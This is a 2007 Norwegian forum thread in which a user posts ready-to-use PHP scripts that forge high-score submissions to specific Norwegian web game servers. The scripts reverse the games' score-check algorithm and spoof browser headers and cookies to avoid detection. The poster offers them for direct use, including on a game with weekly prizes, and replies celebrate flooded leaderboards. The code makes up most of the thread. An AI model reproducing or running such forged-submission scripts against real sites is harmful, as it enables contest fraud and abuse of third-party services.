Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  16 4365
Da er det på'n igjen med hackingen. Skulle gjerne skrevet om noe annet, men akkurat nå kan jeg ikke bidra med noe annet av interesse. Denne gangen skal jeg ikke bare kjede dere med kode, jeg skal gi dere scripts dere kan bruke direkte. De som er interesserte i hacking/PHP får sikkert noe ut av å studere kildekodene til scriptene.

Det store spørsmålet er; hvor lang tid tar det før noen av spillprodusentene oppdaterer krypteringen sin etter dette? Spennende. Jeg linker ikke til spillene med URL i dette tråden, da det vil føre til at spillfolka får nFF som referer. Copy-paste URL'ene. Admin: please skru av KP til denne tråden, da alle kidsa kommer til å elske dette.

Blokkokopter

Link til spillet: internettopplysningen.no/blokko.php

Her er det ingen premier å vinne, men alle elsker dette spillet uansett, og det å ha navnet sitt på lista betyr masse. Eller gjør det egentlig det? Ikke hvis du følger denne linken. Om ti sekunder har du navnet ditt på toppen. Gratulerer!

For de mer interesserte, så er koden her:

Kode

	if ($_POST) {
		$data = getData($_POST);
		$score = $_POST["score"];
		$changeold = $score*0.2-$score*90;
		$ch = init_();
		for ($i=0; $i<10; $i++) {						// Hvorfor gjør vi dette 10 ganger?
			$changeold-=0.3;							// Fordi changeold-variablen er FØKKA.
			$result = send($ch, $data . $changeold);	// Dette er en work-around. Ikke spør.
			if ($result) print $result;
		}
		curl_close($ch);
	}
	printForm($_POST);

	function getData() {
		$name = $_POST["name"];
		$score = $_POST["score"];
		$unique14 = 10+$score*0.13+0.01*$score;
		$unique03 =	31+$score/16+0.01*$score;
		$unique16 =	12+$score*0.05-0.2*$score;
		$unique09 =	61+$score/6+0.01*$score;
		$unique01 =	31+$score/2+0.01*$score;
		$unique15 =	68+$score/12+51-0.06*$score;
		$unique41 =	32+$score*0.01+0.01*$score;
		$unique11 =	76+$score/10+0.01*$score;
		$explosiondone = $score-280+$score*0.13;
		return "highstatus=OK&highname=$name&highscore=$score&unique14=$unique14&unique03=$unique03&unique16=$unique16&unique09=$unique09&unique01=$unique01&unique15=$unique15&unique41=$unique41&unique11=$unique11&explosiondone=$explosiondone&changeold=";
	}

	function send($ch, $data) {
		curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
		return curl_exec($ch);
	}

	function init_() {
		$url = "http://www.internettopplysningen.no/blokko/blokkokopter_posthigh.php";
		$referer = "http://www.internettopplysningen.no/blokko/";
		$agent = "Opera/9.10 (Macintosh; Intel Mac OS X; U; en)";
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
		curl_setopt($ch, CURLOPT_USERAGENT, $agent);
		curl_setopt($ch, CURLOPT_REFERER, $referer);
		return $ch;
	}

	function printForm($_POST) {
		$score = $_POST["score"];
		$name = $_POST["name"];
		print "<title>Blokko</title>
		<h1>Blokko</h1>
		<form action='' method='post'>
			name: <input type='text' name='name' value='$name'><br>
			score: <input type='text' name='score' value='$score'><br><br>
			<input type='submit' name='submit' value='Send'><br><br>
		</form>
		Copyleft 2007 dexter";	
	}
Wave Navigator

Link til spillet: wavekjeden.no/navigator/

Her er det ukentlige premier, hvor du blant annet kan vinne HellyHansen-jakke til fem tusen kroner! Lyst på? Trykk her, da vel!

Kode:

Kode

	$title = "Wave-ting";		// Tittelen til scriptet.

	if ($_POST) {
		$id = getId();				// Vi lager en ID som skal bli sendt hver gang vi gjør en spørring for å identifisere oss.
		$k = getK(load_($id));		// Vi gjør en spørring, og får en "k"-variabel tilbake. Denne trenger vi til senere.
		spill($id);					// Vi gir beskjed til spillet om at det er i gang.
		lagre($_POST, $k);			// Vi lagrer scoren og gir med k-variabelen for verifikasjon.
	}

	printForm($title);			// Vi printer ut skjema så brukeren kan plotte personalia og poengsum.

	function getK($str) {					// Vi henter K fra serverens respons.
		return substr($str, 4, 10);
	}

	function getId() {						// Vi lager vår ID slik den blir laget i spillet.
		$time = microtime(true)*10000;
		$k = substr($time,1,12) . rand(0,1000);
		return $k;
	}

	function lagre($_POST, $k) {
		$score = 90000 - $_POST["score"];
		$user = heal($score, $k);			// "Heal" er en funskjon i spillet som lager en string basert på poeng og k-variabelen. Jeg porta den til PHP.
		$nick = urlencode($_POST["nick"] . " ");
		$epost = urlencode($_POST["epost"]);
		$data = "streng=streng&land=0&epost=$epost&nick=$nick&user=$user&score=$score&handling=lagrespill&identifikator=$identifikator";
		print "<br>". $result = send($data);			// Alle data blir sendt og vi er glade.
	}

	function spill($id) {
		$data ="handling=spill&identifikator=$identifikator";
		return send($data);
	}

	function load_($id) {
		$data ="handling=load&identifikator=$id";
		return send($data);
	}

	function printForm($title) {					// Skjemaet som først vises, der brukeren 	
		print (										// skriver inn personalia og ønsket poengsum.
			"<meta http-equiv='Content-Type' content='text/html;charset=utf-8'/>
			<title>$title</title>
			<h1>$title</h1>
			Dette scriptet er laget for læringens skyld og skal ikke brukes av noen.<br><br>
			<form action='' method='post'>
			score: <input type='text' name='score' value=''><br>
			nick: <input type='text' name='nick' value=''><br>
			epost: <input type='text' name='epost' value=''><br><br>
			<input type='submit' name ='submit' value='Send'><br>
			</form>
			Copyleft 2007 dexter
		");
	}

	function send($data) {													// Det er denne funksjonen som sender data.
		$url = "http://www.agensspill.no/wave/navigator/input.php";			// Den mimicer alle aspekter av en browser,
		$cookie = "kjeks.txt";												// så det ikke ser suspekt ut.
		$agent = "Opera/9.10 (Macintosh; Intel Mac OS X; U; en)";
		$referer = "http://www.agensspill.no/visitnorway/holmenkollen/";
		$header[] = "Host: www.agensspill.no";
		$header[] = "Cookie: _CC=visit";
		$header[] = "Content-Length: " . strlen($data);
		$header[] = "Content-type: application/x-www-form-urlencoded";
		$ch = curl_init($url);									
		curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);			// Vi oppretter en kjeksfil som spillet/nettsiden 
		curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);			// kan styre med. Nå kan vi se bort fra kjeks!
		curl_setopt($ch, CURLOPT_USERAGENT, $agent);			// Vi mimicer useragent		
		curl_setopt($ch, CURLOPT_REFERER, $referer);			// og referer.
		curl_setopt($ch, CURLOPT_POST, 1);						// Denne betyr at vi sender POST (i motsetning til GET)
		curl_setopt($ch, CURLOPT_POSTFIELDS, $data);			// Vi sender med postdata,
		curl_setopt($ch, CURLOPT_HTTPHEADER, $header);			// og headeren.
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);			// Denne gjør at serverresponsen blir returnert.
		$result = curl_exec($ch);					// Vi kjører spørringen,
		curl_close($ch);							// avslutter curl,
		return $result;								// og returnerer serverresponsen.
	}

	function heal($a, $b) {			// Dette er en port av algoritmen 
		$h = 10;					// som blir brukt i spillet til 
		$k = 1;						// å lage en kryptert kontrollstreng.
		$c = 11;
		$o = 12;
		$r = 90;
		$g = 65;
		$v16 = $a + $b;
		$v14 = $a + 5432;
		$v12 = $a + $b + $h - $k;
		$v10 = $v16 . "/" . $v14 . "/" . $v12 . "/";
		$v2 = $k;
		while ($v6 < strlen($v10)) {
			$v3 = substr($v10, $v6, $k);
	        if ($v3 == ".") $v4 = $c + $v2;
			else if ($v3 == "/") $v4 = $o + $v2;
			else if ($v3 == "0") $v4 = $h + $v2;
			else $v4 = $v3 + $v2;
	        $v8 .= chr($v4 + 65);
	        $v2++;
	        if ($v2 == $h) $v2 = $c - $h - $k;
	        $v6++;
		}
	    $b = 0;
	    while ($b <= strlen($v8)) {
	    	$v9 .= substr($v8, strlen($v8) - $b, 1);
	        $b++;
	    }
	    $v13 = $v9;
		$max = getrandmax();
	    while ($v5 < strlen($v9)) {
	    	$v11 .= chr(floor(rand(0,$max)*($r - $g + $k)/$max) + $g) . chr(floor(rand(0,$max)*($r - $g + $k)/$max) + $g) . substr($v9, $v5, 1);
	        $v5++;
	    }
	    return $v11;
	}
Jævlig kode? Ikke min feil. Tok meg en del timer å nøste opp i driten. En verdig utfordring - tusen takk, Agensspill! Jeg har kommentert koden, så dere bør kjønne hva som skjer, om ikke annet.

Trysil Twintip

Link til spillet: trysiltwintip.visitnorway.com

Denne er også laget av Agensspill, de som laga Wave-tingen over. Konkurransen er desverre utløpt, men det hindrer ikke oss i å floode highscorelista! Gratulerer.

Her gir jeg ingen kode, fordi den er ca. lik Wave-tingen.

Holmenkollen Ski Jump

Link til spillet: skijump.visitnorway.com

Også laget av Agensspill, og også utløpt. Tjo-og-hei!

Takk til ulldott for serverplass! (6.1 KB)
Sist endret av liasis; 8. august 2007 kl. 02:54.
Det er ikke serverplassen du skal takke for, det er båndbredden :3 Nå vet jo hele nFF hvor på internett jeg bor!
Sist endret av ulldott; 7. august 2007 kl. 22:45.
*nynne* "... Oh do you, do you dig destruction?...."

Fin tråd! håper bare at ikke Galleriet blir overfylt med skrytebilder med "highscore 231564^12"

[EDIT:] fus for kvalitetspoengene som dexter ikke vil ha!

Sitat av DoktorLars
Jeg er allerede spent på hva slags ablegøyer du skal finne på neste gang!
Vis hele sitatet...
kanskje dexter finner en måte å avskaffe KP?
Sist endret av Turbolego; 7. august 2007 kl. 23:39.
haha motsi seg selv eller? bare hadde kunnet php hadde denne tråden vært 10x så informativ. Jeg har faktisk 4 kp til bruk O.o
Sist endret av mombog; 7. august 2007 kl. 23:05.
Må si du har veldig GODE emner!

Tusen takk for alt og alle tingene du har postet, kjerne kar

EDIT: Mange flere KP enn innlegg xD, wtf^^
Sist endret av RampLest; 7. august 2007 kl. 23:08.
Kult.. MÅ testes senere en gang
dexter har gjort det igjen! Stå på dexter, det er sånne som deg som gir oss retten til å kalles oss freakforum!
<?php echo 'VIF'; ?>
datagutten's Avatar
Takk for nok en god hacke-spill tråd. Etter at jeg lærte å bruke tamper data av din freia-tråd, greide jeg å samle opplysninger for å lage mitt eget coke.no interface.
Du er ikke tilfeldigvis en macbruker også?
$agent = "Opera/9.10 (Macintosh; Intel Mac OS X; U; en)";
Sist endret av datagutten; 7. august 2007 kl. 23:35.
Dæven steike, Dexter, du klarer virkelig å imponere meg gang på gang. Denne gangen har du virkelig overgått deg selv! Jeg er allerede spent på hva slags ablegøyer du skal finne på neste gang!

Å, den Dexter, for en skøyer!
tittel
dexter's Avatar
Trådstarter
Haha, nå er Blokko-lista flooda med score=32767, noe som kan se ut som max-score! Kjenner jeg dem rett så nullstiller de lista ganske snart, slik de vanligvis gjør hver gang dette skjer.

Forresten, i tidsfeltet i Wave Navigator er det millisekunder som skal skrives inn. Skal informere om det i selve scriptet senere.
Sist endret av dexter; 8. august 2007 kl. 12:44.
Back to 127.0.0.1
boblesaft's Avatar
Kul tråd! Jeg skal studere php koden senere :P
Artig det Helicopterspillet. Men jeg foretrekker klassikeren; http://www.addictinggames.com/helicopter.html
▼ ... over en uke senere ... ▼
Dexter, du er et STOOORT forbilde du............
Genial tråd følse deilig å nedelig kommer på highscoren
▼ ... noen måneder senere ... ▼
kanskje du har lyst til å lage en liten kode til jetman også? skal knuse kammeraten min skjønner du.
Sitat av max-mekka
kanskje du har lyst til å lage en liten kode til jetman også? skal knuse kammeraten min skjønner du.
Vis hele sitatet...
Du mener en "extended" versjon av "Post Guide: Cheate på Jetman" ?
▼ ... noen måneder senere ... ▼
Du vet ikke hvordan man kan fikse Crazy Taxi på facebook?
▼ ... over en uke senere ... ▼
Last ned cheat engine og speedhack davell..